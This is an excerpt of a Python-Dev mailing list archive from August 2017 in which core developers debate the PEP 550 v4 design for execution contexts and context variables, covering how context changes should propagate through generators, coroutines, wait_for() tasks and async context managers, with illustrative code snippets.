> async def some_calculation(): > my_parameter.set(my_parameter.get() + 2) > > my_parameter.delete() I initially designed the API to be part of the sys module, which doesn't have any classes and has only functions. Having ContextVar class exposed directly in the contextvars module makes sense. We can also replace new_execution_context() and new_logical_context() with contextvars.ExecutionContext() and contextvars.LogicalContext(). Yury From solipsis at pitrou.net Tue Aug 29 14:40:21 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Tue, 29 Aug 2017 20:40:21 +0200 Subject: [Python-Dev] PEP 550 v4: coroutine policy References: Message-ID: <20170829204021.16934837@fsol> On Mon, 28 Aug 2017 17:24:29 -0400 Yury Selivanov wrote: > Long story short, I think we need to rollback our last decision to > prohibit context propagation up the call stack in coroutines. In PEP > 550 v3 and earlier, the following snippet would work just fine: > > var = new_context_var() > > async def bar(): > var.set(42) > > async def foo(): > await bar() > assert var.get() == 42 # with previous PEP 550 semantics > > run_until_complete(foo()) > > But it would break if a user wrapped "await bar()" with "wait_for()": > > var = new_context_var() > > async def bar(): > var.set(42) > > async def foo(): > await wait_for(bar(), 1) > assert var.get() == 42 # AssertionError !!! > > run_until_complete(foo()) > [...] > So I guess we have no other choice other than reverting this spec > change for coroutines. The very first example in this email should > start working again. What about the second one? Why wouldn't the bar() coroutine inherit the LC at the point it's instantiated (i.e. where the synchronous bar() call is done)? > This means that PEP 550 will have a caveat for async code: don't rely > on context propagation up the call stack, unless you are writing > __aenter__ and __aexit__ that are guaranteed to be called without > being wrapped into a Task. Hmm, sorry for being a bit slow, but I'm not sure what this sentence implies. How is the user supposed to know whether something will be wrapped into a Task (short of being an expert in asyncio internals perhaps)? Actually, if could whip up an example of what you mean here, it would be helpful I think :-) > Thus I propose to stop associating PEP 550 concepts with > (dynamic) scoping. Agreed that dynamic scoping is a red herring here. Regards Antoine. From yselivanov.ml at gmail.com Tue Aug 29 14:49:18 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Tue, 29 Aug 2017 14:49:18 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> Message-ID: On Mon, Aug 28, 2017 at 7:16 PM, Yury Selivanov wrote: > On Mon, Aug 28, 2017 at 6:56 PM, Greg Ewing wrote: >> Yury Selivanov wrote: >>> >>> I saying that the following should not work: >>> >>> def nested_gen(): >>> set_some_context() >>> yield >>> >>> def gen(): >>> # some_context is not set >>> yield from nested_gen() >>> # use some_context ??? >> >> >> And I'm saying it *should* work, otherwise it breaks >> one of the fundamental principles on which yield-from >> is based, namely that 'yield from foo()' should behave >> as far as possible as a generator equivalent of a >> plain function call. >> > > Consider the following generator: > > > def gen(): > with decimal.context(...): > yield > > > We don't want gen's context to leak to the outer scope -- that's one > of the reasons why PEP 550 exists. Even if we do this: > > g = gen() > next(g) > # the decimal.context won't leak out of gen > > So a Python user would have a mental model: context set in generators > doesn't leak. > > Not, let's consider a "broken" generator: > > def gen(): > decimal.context(...) > yield > > If we iterate gen() with next(), it still won't leak its context. But > if "yield from" has semantics that you want -- "yield from" to be just > like function call -- then calling > > yield from gen() > > will corrupt the context of the caller. > > I simply want consistency. It's easier for everybody to say that > generators never leaked their context changes to the outer scope, > rather than saying that "generators can sometimes leak their context". Adding to the above: there's a fundamental reason why we can't make "yield from" transparent for EC modifications. While we want "yield from" to have semantics close to a function call, in some situations we simply can't. Because you can manually iterate a generator and then 'yield from' it, you can have this weird 'partial-function-call' semantics. For example: var = new_context_var() def gen(): var.set(42) yield yield Now, we can partially iterate the generator (1): def main(): g = gen() next(g) # we don't want 'g' to leak its EC changes, # so var.get() is None here. assert var.get() is None and then we can "yield from" it (2): def main(): g = gen() next(g) # we don't want 'g' to leak its EC changes, # so var.get() is None here. assert var.get() is None yield from g # at this point it's too late for us to let var leak into # main().__logical_context__ For (1) we want the context change to be isolated. For (2) you say that the context change should propagate to the caller. But it's impossible: 'g' already has its own LC({var: 42}), and we can't merge it with the LC of "main()". "await" is fundamentally different, because it's not possible to partially iterate the coroutine before awaiting it (asyncio will break if you call "coro.send(None)" manually). Yury From yselivanov.ml at gmail.com Tue Aug 29 15:18:09 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Tue, 29 Aug 2017 15:18:09 -0400 Subject: [Python-Dev] PEP 550 v4: coroutine policy In-Reply-To: <20170829204021.16934837@fsol> References: <20170829204021.16934837@fsol> Message-ID: On Tue, Aug 29, 2017 at 2:40 PM, Antoine Pitrou wrote: > On Mon, 28 Aug 2017 17:24:29 -0400 > Yury Selivanov wrote: >> Long story short, I think we need to rollback our last decision to >> prohibit context propagation up the call stack in coroutines. In PEP >> 550 v3 and earlier, the following snippet would work just fine: >> >> var = new_context_var() >> >> async def bar(): >> var.set(42) >> >> async def foo(): >> await bar() >> assert var.get() == 42 # with previous PEP 550 semantics >> >> run_until_complete(foo()) >> >> But it would break if a user wrapped "await bar()" with "wait_for()": >> >> var = new_context_var() >> >> async def bar(): >> var.set(42) >> >> async def foo(): >> await wait_for(bar(), 1) >> assert var.get() == 42 # AssertionError !!! >> >> run_until_complete(foo()) >> > [...] > >> So I guess we have no other choice other than reverting this spec >> change for coroutines. The very first example in this email should >> start working again. > > What about the second one? Just to be clear: in the next revision of the PEP, the first example will work without an AssertionError; second example will keep raising an AssertionError. > Why wouldn't the bar() coroutine inherit > the LC at the point it's instantiated (i.e. where the synchronous bar() > call is done)? We want tasks to have their own isolated contexts. When a task is started, it runs its code in parallel with its "parent" task. We want each task to have its own isolated EC (OS thread/TLS vs async task/EC analogy), otherwise the EC of "foo()" will be randomly changed by the tasks it spawned. wait_for() in the above example creates an asyncio.Task implicitly, and that's why we don't see 'var' changed to '42' in foo(). This is a slightly complicated case, but it's addressable with a good documentation and recommended best practices. > >> This means that PEP 550 will have a caveat for async code: don't rely >> on context propagation up the call stack, unless you are writing >> __aenter__ and __aexit__ that are guaranteed to be called without >> being wrapped into a Task. > > Hmm, sorry for being a bit slow, but I'm not sure what this > sentence implies. How is the user supposed to know whether something > will be wrapped into a Task (short of being an expert in asyncio > internals perhaps)? > > Actually, if could whip up an example of what you mean here, it would > be helpful I think :-) __aenter__ won't ever be wrapped in a task because its called by the interpreter. var = new_context_var() class MyAsyncCM: def __aenter__(self): var.set(42) async with MyAsyncCM(): assert var.get() == 42 The above snippet will always work as expected. We'll update the PEP with thorough explanation of all these nuances in the semantics. Yury From antoine at python.org Tue Aug 29 15:32:35 2017 From: antoine at python.org (Antoine Pitrou) Date: Tue, 29 Aug 2017 21:32:35 +0200 Subject: [Python-Dev] PEP 550 v4: coroutine policy In-Reply-To: References: <20170829204021.16934837@fsol> Message-ID: Le 29/08/2017 ? 21:18, Yury Selivanov a ?crit : > On Tue, Aug 29, 2017 at 2:40 PM, Antoine Pitrou wrote: >> On Mon, 28 Aug 2017 17:24:29 -0400 >> Yury Selivanov wrote: >>> Long story short, I think we need to rollback our last decision to >>> prohibit context propagation up the call stack in coroutines. In PEP >>> 550 v3 and earlier, the following snippet would work just fine: >>> >>> var = new_context_var() >>> >>> async def bar(): >>> var.set(42) >>> >>> async def foo(): >>> await bar() >>> assert var.get() == 42 # with previous PEP 550 semantics >>> >>> run_until_complete(foo()) >>> >>> But it would break if a user wrapped "await bar()" with "wait_for()": >>> >>> var = new_context_var() >>> >>> async def bar(): >>> var.set(42) >>> >>> async def foo(): >>> await wait_for(bar(), 1) >>> assert var.get() == 42 # AssertionError !!! >>> >>> run_until_complete(foo()) >>> >> [...] > >> Why wouldn't the bar() coroutine inherit >> the LC at the point it's instantiated (i.e. where the synchronous bar() >> call is done)? > > We want tasks to have their own isolated contexts. When a task > is started, it runs its code in parallel with its "parent" task. I'm sorry, but I don't understand what it all means. To pose the question differently: why is example #1 supposed to be different, philosophically, than example #2? Both spawn a coroutine, both wait for its execution to end. There is no reason that adding a wait_for() intermediary (presumably because the user wants to add a timeout) would significantly change the execution semantics of bar(). > wait_for() in the above example creates an asyncio.Task implicitly, > and that's why we don't see 'var' changed to '42' in foo(). I don't understand why a non-obvious behaviour detail (the fact that wait_for() creates an asyncio.Task implicitly) should translate into a fundamental difference in observable behaviour. I find it counter-intuitive and error-prone. > This is a slightly complicated case, but it's addressable with a good > documentation and recommended best practices. It would be better addressed with consistent behaviour that doesn't rely on specialist knowledge, though :-/ >>> This means that PEP 550 will have a caveat for async code: don't rely >>> on context propagation up the call stack, unless you are writing >>> __aenter__ and __aexit__ that are guaranteed to be called without >>> being wrapped into a Task. >> >> Hmm, sorry for being a bit slow, but I'm not sure what this >> sentence implies. How is the user supposed to know whether something >> will be wrapped into a Task (short of being an expert in asyncio >> internals perhaps)? >> >> Actually, if could whip up an example of what you mean here, it would >> be helpful I think :-) > > __aenter__ won't ever be wrapped in a task because its called by > the interpreter. > > var = new_context_var() > > class MyAsyncCM: > > def __aenter__(self): > var.set(42) > > async with MyAsyncCM(): > assert var.get() == 42 > > The above snippet will always work as expected. Uh... So I really don't understand what you meant above when you wrote: """ This means that PEP 550 will have a caveat for async code: don't rely on context propagation up the call stack, unless you are writing __aenter__ and __aexit__ that are guaranteed to be called without being wrapped into a Task. """ To ask the question again: can you showcase how and where the "caveat" applies? Regards Antoine. From yselivanov.ml at gmail.com Tue Aug 29 15:59:19 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Tue, 29 Aug 2017 15:59:19 -0400 Subject: [Python-Dev] PEP 550 v4: coroutine policy In-Reply-To: References: <20170829204021.16934837@fsol> Message-ID: On Tue, Aug 29, 2017 at 3:32 PM, Antoine Pitrou wrote: > > > Le 29/08/2017 ? 21:18, Yury Selivanov a ?crit : >> On Tue, Aug 29, 2017 at 2:40 PM, Antoine Pitrou wrote: >>> On Mon, 28 Aug 2017 17:24:29 -0400 >>> Yury Selivanov wrote: >>>> Long story short, I think we need to rollback our last decision to >>>> prohibit context propagation up the call stack in coroutines. In PEP >>>> 550 v3 and earlier, the following snippet would work just fine: >>>> >>>> var = new_context_var() >>>> >>>> async def bar(): >>>> var.set(42) >>>> >>>> async def foo(): >>>> await bar() >>>> assert var.get() == 42 # with previous PEP 550 semantics >>>> >>>> run_until_complete(foo()) >>>> >>>> But it would break if a user wrapped "await bar()" with "wait_for()": >>>> >>>> var = new_context_var() >>>> >>>> async def bar(): >>>> var.set(42) >>>> >>>> async def foo(): >>>> await wait_for(bar(), 1) >>>> assert var.get() == 42 # AssertionError !!! >>>> >>>> run_until_complete(foo()) >>>> >>> [...] >> >>> Why wouldn't the bar() coroutine inherit >>> the LC at the point it's instantiated (i.e. where the synchronous bar() >>> call is done)? >> >> We want tasks to have their own isolated contexts. When a task >> is started, it runs its code in parallel with its "parent" task. > > I'm sorry, but I don't understand what it all means. > > To pose the question differently: why is example #1 supposed to be > different, philosophically, than example #2? Both spawn a coroutine, > both wait for its execution to end. There is no reason that adding a > wait_for() intermediary (presumably because the user wants to add a > timeout) would significantly change the execution semantics of bar(). I see your point. The currently published version of the PEP (v4) fixes this by saying: each coroutine has its own LC. Therefore, "var.set(42)" cannot be visible to the code that calls "bar()". And therefore, "await wait_for(bar())" and "await bar()" work the same way with regards to execution context semantics. *Unfortunately*, while this fixes above examples to work the same way, setting context vars in "__aenter__" stops working: class MyAsyncCM: def __aenter__(self): var.set(42) async with MyAsyncCM(): assert var.get() == 42 Because __aenter__ has its own LC, the code wrapped in "async with" will not see the effect of "var.set(42)"! This absolutely needs to be fixed, and the only way (that I know) it can be fixed is to revert the "every coroutine has its own LC" statement (going back to the semantics coroutines had in PEP 550 v2 and v3). > >> wait_for() in the above example creates an asyncio.Task implicitly, >> and that's why we don't see 'var' changed to '42' in foo(). > > I don't understand why a non-obvious behaviour detail (the fact that > wait_for() creates an asyncio.Task implicitly) should translate into a > fundamental difference in observable behaviour. I find it > counter-intuitive and error-prone. "await bar()" and "await wait_for(bar())" are actually quite different. Let me illustrate with an example: b1 = bar() # bar() is not running yet await b1 b2 = wait_for(bar()) # bar() was wrapped into a Task and is being running right now await b2 Usually this difference is subtle, but in asyncio it's perfectly fine to never await on b2, just let it run until it completes. If you don't "await b1" -- b1 simply will never run. All in all, we can't say that "await bar()" and "await wait_for(bar())" are equivalent. The former runs bar() synchronously within the coroutine that awaits it. The latter runs bar() in a completely separate and detached task in parallel to the coroutine that spawned it. > >> This is a slightly complicated case, but it's addressable with a good >> documentation and recommended best practices. > > It would be better addressed with consistent behaviour that doesn't rely > on specialist knowledge, though :-/ I agree. But I don't see any other solution that would solve the problem *and* satisfy the following requirements: 1. Context variables set in "CM.__aenter__" and "CM.__aexit__" should be visible to code that is wrapped in "async with CM()". 2. Tasks must have isolated contexts -- changes that coroutines do to the EC in one Task, should not be visible to other Tasks. Yury From njs at pobox.com Tue Aug 29 16:06:44 2017 From: njs at pobox.com (Nathaniel Smith) Date: Tue, 29 Aug 2017 13:06:44 -0700 Subject: [Python-Dev] PEP 550 v4: coroutine policy In-Reply-To: References: <20170829204021.16934837@fsol> Message-ID: On Tue, Aug 29, 2017 at 12:32 PM, Antoine Pitrou wrote: > > > Le 29/08/2017 ? 21:18, Yury Selivanov a ?crit : >> On Tue, Aug 29, 2017 at 2:40 PM, Antoine Pitrou wrote: >>> On Mon, 28 Aug 2017 17:24:29 -0400 >>> Yury Selivanov wrote: >>>> Long story short, I think we need to rollback our last decision to >>>> prohibit context propagation up the call stack in coroutines. In PEP >>>> 550 v3 and earlier, the following snippet would work just fine: >>>> >>>> var = new_context_var() >>>> >>>> async def bar(): >>>> var.set(42) >>>> >>>> async def foo(): >>>> await bar() >>>> assert var.get() == 42 # with previous PEP 550 semantics >>>> >>>> run_until_complete(foo()) >>>> >>>> But it would break if a user wrapped "await bar()" with "wait_for()": >>>> >>>> var = new_context_var() >>>> >>>> async def bar(): >>>> var.set(42) >>>> >>>> async def foo(): >>>> await wait_for(bar(), 1) >>>> assert var.get() == 42 # AssertionError !!! >>>> >>>> run_until_complete(foo()) >>>> >>> [...] >> >>> Why wouldn't the bar() coroutine inherit >>> the LC at the point it's instantiated (i.e. where the synchronous bar() >>> call is done)? >> >> We want tasks to have their own isolated contexts. When a task >> is started, it runs its code in parallel with its "parent" task. > > I'm sorry, but I don't understand what it all means. > > To pose the question differently: why is example #1 supposed to be > different, philosophically, than example #2? Both spawn a coroutine, > both wait for its execution to end. There is no reason that adding a > wait_for() intermediary (presumably because the user wants to add a > timeout) would significantly change the execution semantics of bar(). > >> wait_for() in the above example creates an asyncio.Task implicitly, >> and that's why we don't see 'var' changed to '42' in foo(). > > I don't understand why a non-obvious behaviour detail (the fact that > wait_for() creates an asyncio.Task implicitly) should translate into a > fundamental difference in observable behaviour. I find it > counter-intuitive and error-prone. For better or worse, asyncio users generally need to be aware of the distinction between coroutines/Tasks/Futures and which functions create or return which -- it's essentially the same as the distinction between running some code in the current thread versus spawning a new thread to run it (and then possibly waiting for the result). Mostly the docs tell you when a function converts a coroutine into a Task, e.g. if you look at the docs for 'ensure_future' or 'wait_for' or 'wait' they all say this explicitly. Or in some cases like 'gather' and 'shield', it's implicit because they take arbitrary futures, and creating a task is how you convert a coroutine into a future. As a rule of thumb, I think it's accurate to say that any function that takes a coroutine object as an argument always converts it into a Task. >> This is a slightly complicated case, but it's addressable with a good >> documentation and recommended best practices. > > It would be better addressed with consistent behaviour that doesn't rely > on specialist knowledge, though :-/ This is the core of the Curio/Trio critique of asyncio: in asyncio, operations that implicitly initiate concurrent execution are all over the API. This is the root cause of asyncio's problems with buffering and backpressure, it makes it hard to shut down properly (it's hard to know when everything has finished running), it's related to the "spooky cancellation at a distance" issue where cancelling one task can cause another Task to get a cancelled exception, etc. If you use the recommended "high level" API for streams, then AFAIK it's still impossible to close your streams properly at shutdown (you can request that a close happen "sometime soon", but you can't tell when it's finished). Obviously asyncio isn't going anywhere, so we should try to solve/mitigate these issues where we can, but asyncio's API fundamentally assumes that users will be very aware and careful about which operations create which kinds of concurrency. So I sort of feel like, if you can use asyncio at all, then you can handle wait_for creating a new LC. -n [1] https://vorpus.org/blog/some-thoughts-on-asynchronous-api-design-in-a-post-asyncawait-world/#bug-3-closing-time -- Nathaniel J. Smith -- https://vorpus.org From antoine at python.org Tue Aug 29 16:10:01 2017 From: antoine at python.org (Antoine Pitrou) Date: Tue, 29 Aug 2017 22:10:01 +0200 Subject: [Python-Dev] PEP 550 v4: coroutine policy In-Reply-To: References: <20170829204021.16934837@fsol> Message-ID: Le 29/08/2017 ? 21:59, Yury Selivanov a ?crit : > > This absolutely needs to be fixed, and the only way (that I know) it > can be fixed is to revert the "every coroutine has its own LC" > statement (going back to the semantics coroutines had in PEP 550 v2 > and v3). I completely agree with this. What I don't understand is why example #2 can't work the same. > "await bar()" and "await wait_for(bar())" are actually quite > different. Let me illustrate with an example: > > b1 = bar() > # bar() is not running yet > await b1 > > b2 = wait_for(bar()) > # bar() was wrapped into a Task and is being running right now > await b2 > > Usually this difference is subtle, but in asyncio it's perfectly fine > to never await on b2, just let it run until it completes. If you > don't "await b1" -- b1 simply will never run. Perhaps... But still, why doesn't bar() inherit the LC *at the point where it was instantiated* (i.e. foo()'s LC in the examples)? The fact that it's *later* passed to wait_for() shouldn't matter, right? Or should it? Regards Antoine. From njs at pobox.com Tue Aug 29 16:18:51 2017 From: njs at pobox.com (Nathaniel Smith) Date: Tue, 29 Aug 2017 13:18:51 -0700 Subject: [Python-Dev] PEP 550 v4: coroutine policy In-Reply-To: References: <20170829204021.16934837@fsol> Message-ID: On Tue, Aug 29, 2017 at 12:59 PM, Yury Selivanov wrote: > b2 = wait_for(bar()) > # bar() was wrapped into a Task and is being running right now > await b2 Ah.... not quite. wait_for is itself implemented as a coroutine, so it doesn't spawn off bar() into its own task until you await b2. Though according to the docs you should pretend that you don't know whether wait_for returns a coroutine or a Future, so what you said would also be a conforming implementation. -n -- Nathaniel J. Smith -- https://vorpus.org From yselivanov.ml at gmail.com Tue Aug 29 16:20:21 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Tue, 29 Aug 2017 16:20:21 -0400 Subject: [Python-Dev] PEP 550 v4: coroutine policy In-Reply-To: References: <20170829204021.16934837@fsol> Message-ID: On Tue, Aug 29, 2017 at 4:10 PM, Antoine Pitrou wrote: [..] >> "await bar()" and "await wait_for(bar())" are actually quite >> different. Let me illustrate with an example: >> >> b1 = bar() >> # bar() is not running yet >> await b1 >> >> b2 = wait_for(bar()) >> # bar() was wrapped into a Task and is being running right now >> await b2 >> >> Usually this difference is subtle, but in asyncio it's perfectly fine >> to never await on b2, just let it run until it completes. If you >> don't "await b1" -- b1 simply will never run. > > Perhaps... But still, why doesn't bar() inherit the LC *at the point > where it was instantiated* (i.e. foo()'s LC in the examples)? The fact > that it's *later* passed to wait_for() shouldn't matter, right? Or > should it? bar() will inherit the lookup chain. Two examples: 1) gvar = new_context_var() var = new_context_var() async def bar(): # EC = [current_thread_LC_copy, Task_foo_LC] var.set(42) assert gvar.get() == 'aaaa' async def foo(): # EC = [current_thread_LC_copy, Task_foo_LC] gvar.set('aaaa') await bar() assert var.get() == 42 # with previous PEP 550 semantics assert gvar.get() == 'aaaa' # EC = [current_thread_LC] run_until_complete(foo()) # Task_foo 2) gvar = new_context_var() var = new_context_var() async def bar(): # EC = [current_thread_LC_copy, Task_foo_LC_copy, Task_wait_for_LC] var.set(42) assert gvar.get() == 'aaaa' async def foo(): # EC = [current_thread_LC_copy, Task_foo_LC] await wait_for(bar(), 1) # bar() is wrapped into Task_wait_for implicitly assert gvar.get() == 'aaaa' # OK assert var.get() == 42 # AssertionError !!! # EC = [current_thread_LC] run_until_complete(foo()) # Task_foo The key difference: In example (1), bar() will have the LC of the Task that runs foo(). Both "foo()" and "bar()" will *share* the same LC. That's why foo() will see changes made in bar(). In example (2), bar() will have the LC of wait_for() task, and foo() will have a different LC. Yury From antoine at python.org Tue Aug 29 16:33:00 2017 From: antoine at python.org (Antoine Pitrou) Date: Tue, 29 Aug 2017 22:33:00 +0200 Subject: [Python-Dev] PEP 550 v4: coroutine policy In-Reply-To: References: <20170829204021.16934837@fsol> Message-ID: <42d4fd90-680a-7ea4-1e83-af0cb938a0ee@python.org> Le 29/08/2017 ? 22:20, Yury Selivanov a ?crit : > > 2) > > gvar = new_context_var() > var = new_context_var() > > async def bar(): > # EC = [current_thread_LC_copy, Task_foo_LC_copy, Task_wait_for_LC] Ah, thanks!... That explains things, though I don't expect most users to spontaneously infer this and its consequences from the fact that they used "wait_for()". This seems actually even more problematic, because if bar() can mutate Task_wait_for_LC, it may unwillingly affect wait_for() (assuming the wait_for() implementation may some day use EC for whatever purpose, e.g. logging). It seems framework code like wait_for() should have a way to override the default behaviour and remove their own LC's from "child" coroutines' lookup chaines. Perhaps the PEP already allows for his? Regards Antoine. From yselivanov.ml at gmail.com Tue Aug 29 16:54:54 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Tue, 29 Aug 2017 16:54:54 -0400 Subject: [Python-Dev] PEP 550 v4: coroutine policy In-Reply-To: <42d4fd90-680a-7ea4-1e83-af0cb938a0ee@python.org> References: <20170829204021.16934837@fsol> <42d4fd90-680a-7ea4-1e83-af0cb938a0ee@python.org> Message-ID: On Tue, Aug 29, 2017 at 4:33 PM, Antoine Pitrou wrote: > > Le 29/08/2017 ? 22:20, Yury Selivanov a ?crit : >> >> 2) >> >> gvar = new_context_var() >> var = new_context_var() >> >> async def bar(): >> # EC = [current_thread_LC_copy, Task_foo_LC_copy, Task_wait_for_LC] > > Ah, thanks!... That explains things, though I don't expect most users > to spontaneously infer this and its consequences from the fact that they > used "wait_for()". Yeah, we use "# EC=" comments in the PEP to explain how EC is implemented for generators (in the Detailed Specification section), and will now do the same for coroutines (in the next update). > > This seems actually even more problematic, because if bar() can mutate > Task_wait_for_LC, it may unwillingly affect wait_for() (assuming the > wait_for() implementation may some day use EC for whatever purpose, e.g. > logging). In general the patter is to wrap the passed coroutine into a Task and then attach some callbacks to it (or wrap the coroutine into another coroutine). So while I understand the concern, I can't immediately come up with a realistic example... > > It seems framework code like wait_for() should have a way to override > the default behaviour and remove their own LC's from "child" coroutines' > lookup chaines. Perhaps the PEP already allows for his? Yes, the PEP provides enough APIs to implement any semantics we want. We might want to add "execution_context" kwarg to "asyncio.create_task" to make this customization of EC easy for Tasks. Yury From greg.ewing at canterbury.ac.nz Tue Aug 29 17:45:08 2017 From: greg.ewing at canterbury.ac.nz (Greg Ewing) Date: Wed, 30 Aug 2017 09:45:08 +1200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> Message-ID: <59A5E064.3010101@canterbury.ac.nz> Yury Selivanov wrote: > Consider the following generator: > > def gen(): > with decimal.context(...): > yield > > We don't want gen's context to leak to the outer scope That's understandable, but fixing that problem shouldn't come at the expense of breaking the ability to refactor generator code or async code without changing its semantics. I'm not convinced that it has to, either. In this example, the with-statement is the thing that should be establishing a new nested context. Yielding and re-entering the generator should only be swapping around between existing contexts. > Not, let's consider a "broken" generator: > > def gen(): > decimal.context(...) > yield The following non-generator code is "broken" in exactly the same way: def foo(): decimal.context(...) do_some_decimal_calculations() # Context has now been changed for the caller > I simply want consistency. So do I! We just have different ideas about what consistency means here. > It's easier for everybody to say that > generators never leaked their context changes to the outer scope, > rather than saying that "generators can sometimes leak their context". No, generators should *always* leak their context changes to exactly the same extent that normal functions do. If you don't want to leak a context change, you should use a with statement. What you seem to be suggesting is that generators shouldn't leak context changes even when you *don't* use a with-statement. If you're going to to that, you'd better make sure that the same thing applies to regular functions, otherwise you've introduced an inconsistency. -- Greg From yselivanov.ml at gmail.com Tue Aug 29 18:01:40 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Tue, 29 Aug 2017 18:01:40 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <59A5E064.3010101@canterbury.ac.nz> References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5E064.3010101@canterbury.ac.nz> Message-ID: On Tue, Aug 29, 2017 at 5:45 PM, Greg Ewing wrote: [..] > What you seem to be suggesting is that generators shouldn't > leak context changes even when you *don't* use a with-statement. Yes, generators shouldn't leak context changes regardless of what and how changes the context inside them: var = new_context_var() def gen(): old_val = var.get() try: var.set('blah') yield yield yield finally: var.set(old_val) with the above code, when you do "next(gen())" it would leak the state without PEP 550. "finally" block (or "with" block wouldn't help you here) and corrupt the state of the caller. That's the problem the PEP fixes. The EC interaction with generators is explained here with a great detail: https://www.python.org/dev/peps/pep-0550/#id4 We explain the motivation behind desiring a working context-local solution for generators in the Rationale section: https://www.python.org/dev/peps/pep-0550/#rationale Basically half of the PEP is about isolating context in generators. > If you're going to to that, you'd better make sure that the > same thing applies to regular functions, otherwise you've > introduced an inconsistency. Regular functions cannot pause/resume their execution, so they can't leak an inconsistent context change due to out of order or partial execution. PEP 550 positions itself as a replacement for TLS, and clearly defines its semantics for regular functions in a single thread, regular functions in multithreaded code, generators, and asynchronous code (async/await). Everything is specified in the High-level Specification section. I wouldn't call slightly differently defined semantics for generators/coroutines/functions an "inconsistency" -- they just have a different EC semantics given how different they are from each other. Drawing a parallel between 'yield from' and function calls is possible, but we shouldn't forget that you can 'yield from' a half-iterated generator. Yury From stefan at bytereef.org Tue Aug 29 19:06:55 2017 From: stefan at bytereef.org (Stefan Krah) Date: Wed, 30 Aug 2017 01:06:55 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5E064.3010101@canterbury.ac.nz> Message-ID: <20170829230655.GA4933@bytereef.org> On Tue, Aug 29, 2017 at 06:01:40PM -0400, Yury Selivanov wrote: > PEP 550 positions itself as a replacement for TLS, and clearly defines > its semantics for regular functions in a single thread, regular > functions in multithreaded code, generators, and asynchronous code > (async/await). Everything is specified in the High-level > Specification section. I wouldn't call slightly differently defined > semantics for generators/coroutines/functions an "inconsistency" -- > they just have a different EC semantics given how different they are > from each other. What I don't find so consistent is that the async universe is guarded with async {def, for, with, ...}, but in this proposal regular context managers and context setters implicitly adapt their behavior. So, pedantically, having a language extension like async set(var, value) x = async get(var) and making async-safe context managers explicit async with decimal.localcontext(): ... would feel more consistent. I know generators are a problem, but even allowing something like "async set" in generators would be a step up. Stefan Krah From yselivanov.ml at gmail.com Tue Aug 29 19:34:27 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Tue, 29 Aug 2017 19:34:27 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <20170829230655.GA4933@bytereef.org> References: <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5E064.3010101@canterbury.ac.nz> <20170829230655.GA4933@bytereef.org> Message-ID: On Tue, Aug 29, 2017 at 7:06 PM, Stefan Krah wrote: > On Tue, Aug 29, 2017 at 06:01:40PM -0400, Yury Selivanov wrote: >> PEP 550 positions itself as a replacement for TLS, and clearly defines >> its semantics for regular functions in a single thread, regular >> functions in multithreaded code, generators, and asynchronous code >> (async/await). Everything is specified in the High-level >> Specification section. I wouldn't call slightly differently defined >> semantics for generators/coroutines/functions an "inconsistency" -- >> they just have a different EC semantics given how different they are >> from each other. > > What I don't find so consistent is that the async universe is guarded > with async {def, for, with, ...}, but in this proposal regular context > managers and context setters implicitly adapt their behavior. > > So, pedantically, having a language extension like > > async set(var, value) > x = async get(var) > > and making async-safe context managers explicit > > async with decimal.localcontext(): > ... > > > would feel more consistent. I know generators are a problem, but even > allowing something like "async set" in generators would be a step up. But regular context managers work just fine with asynchronous code. Not all of them have some local state. For example, you could have a context manager to time how long the code wrapped into it executes: async def foo(): with timing(): await ... We use asynchronous context managers only when they need to do asynchronous operations in their __aenter__ and __aexit__ (like DB transaction begin/rollback/commit). Requiring "await" to set a value for context variable would force us to write specialized async CMs for cases where a sync CM would do just fine. This in turn, would make it impossible to use some sync libraries in async code. But there's nothing wrong in using numpy/numpy.errstate in a coroutine. I want to be able to copy/paste their examples into my async code and I'd expect it to just work -- that's the point of the PEP. async/await already requires to have separate APIs in libraries that involve IO. Let's not make the situation worse by asking people to use asynchronous version of PEP 550 even though it's not really needed. Yury From greg.ewing at canterbury.ac.nz Tue Aug 29 19:36:41 2017 From: greg.ewing at canterbury.ac.nz (Greg Ewing) Date: Wed, 30 Aug 2017 11:36:41 +1200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> Message-ID: <59A5FA89.1000001@canterbury.ac.nz> Yury Selivanov wrote: > While we want "yield from" to have semantics close to a function call, That's not what I said! I said that "yield from foo()" should have semantics close to a function call. If you separate the "yield from" from the "foo()", then of course you can get different behaviours. But that's beside the point, because I'm not suggesting that generators should behave differently depending on when or if you use "yield from" on them. > For (1) we want the context change to be isolated. For (2) you say > that the context change should propagate to the caller. No, I'm saying that the context change should *always* propagate to the caller, unless you do something explicit within the generator to prevent it. I have some ideas on what that something might be, which I'll post later. -- Greg From yselivanov.ml at gmail.com Tue Aug 29 19:54:05 2017 From: 